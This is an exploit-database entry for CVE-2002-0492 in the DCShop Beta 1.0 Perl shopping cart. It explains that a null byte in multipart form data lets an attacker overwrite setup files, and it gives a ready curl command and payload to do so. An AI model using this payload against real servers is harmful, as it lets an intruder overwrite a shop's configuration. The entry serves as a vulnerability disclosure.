DCShop Beta 1.0 - Form Manipulation

Author: pokleyzz sakamaniaka
type: webapps
platform: cgi
port: 
date_added: 2002-03-25  
date_updated: 2012-09-17  
verified: 1  
codes: CVE-2002-0492;OSVDB-10433  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 21352.txt  

source: https://www.securityfocus.com/bid/4356/info

DCShop Beta is a freely available shopping cart system, written in Perl. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.

It is possible to overwrite setup files (*.setup) by submitting attacker-supplied form data followed by a null character (%00). The attacker must use the POST method to submit data that is content-type multipart/form-data compliant.

curl -F database=@test.txt http://host/cgi-bin/dcshop.cgi

where test.txt contains databasename.setup[nullbyte].